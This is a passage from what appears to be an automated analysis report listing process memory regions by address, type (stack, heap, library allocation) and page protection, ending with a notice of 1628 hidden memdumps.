stack
page read and write
316B978000
stack
page read and write
2A7F000
stack
page read and write
13680794000
trusted library allocation
page read and write
210DA29A000
heap
page read and write
1D62A0E6000
trusted library allocation
page read and write
13680CB0000
trusted library allocation
page read and write
21A80AD8000
trusted library allocation
page read and write
1DF23A0E000
heap
page read and write
7FF848F9A000
trusted library allocation
page read and write
7FF848C4B000
trusted library allocation
page read and write
136F3A00000
heap
page execute and read and write
3302000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
136808C0000
trusted library allocation
page read and write
165006D2000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
1D627FD0000
heap
page read and write
7FF848E14000
trusted library allocation
page read and write
1F1E4B30000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
1DF25764000
heap
page read and write
13680592000
trusted library allocation
page read and write
18245280000
heap
page read and write
1F1FEC36000
heap
page read and write
8FA3239000
stack
page read and write
13680C7D000
trusted library allocation
page read and write
197AC0E4000
trusted library allocation
page read and write
1656B9B0000
heap
page read and write
B1DC40D000
stack
page read and write
1D639E4C000
trusted library allocation
page read and write
18246DAF000
trusted library allocation
page read and write
1DF2571C000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
7FF848F63000
trusted library allocation
page read and write
7FF848C42000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
353E000
stack
page read and write
BA0000
heap
page read and write
136F390E000
heap
page read and write
3328000
heap
page read and write
21AF4587000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
21AF3F00000
heap
page readonly
50AD5F6000
stack
page read and write
7FF848E90000
trusted library allocation
page read and write
210C025E000
heap
page read and write
165004B9000
trusted library allocation
page read and write
182452C8000
heap
page read and write
1368014A000
trusted library allocation
page read and write
914C5CE000
stack
page read and write
1F1E6250000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
1FD82310000
heap
page read and write
21AF4690000
heap
page read and write
136800C9000
trusted library allocation
page read and write
13680BD6000
trusted library allocation
page read and write
1DF25743000
heap
page read and write
3317000
heap
page read and write
32C0000
heap
page read and write
7FF848DF0000
trusted library allocation
page execute and read and write
7FF848D40000
trusted library allocation
page execute and read and write
3942000
heap
page read and write
13680147000
trusted library allocation
page read and write
197BAC52000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
5E0000
heap
page read and write
271A000
heap
page read and write
B90000
heap
page read and write
7A55675000
stack
page read and write
1DF25732000
heap
page read and write
3323000
heap
page read and write
13680BBD000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
AF4000
stack
page read and write
AC592FE000
stack
page read and write
7FF848E90000
trusted library allocation
page read and write
197ABAC6000
trusted library allocation
page read and write
1D6280CA000
heap
page read and write
1656BAC0000
heap
page read and write
3304000
heap
page read and write
7FF848CF0000
trusted library allocation
page execute and read and write
7FF848E10000
trusted library allocation
page execute and read and write
21AF3EC0000
trusted library allocation
page read and write
B1DB8BE000
stack
page read and write
3329000
heap
page read and write
1DF259F9000
heap
page read and write
16510001000
trusted library allocation
page read and write
There are 1628 hidden memdumps, click here to show them.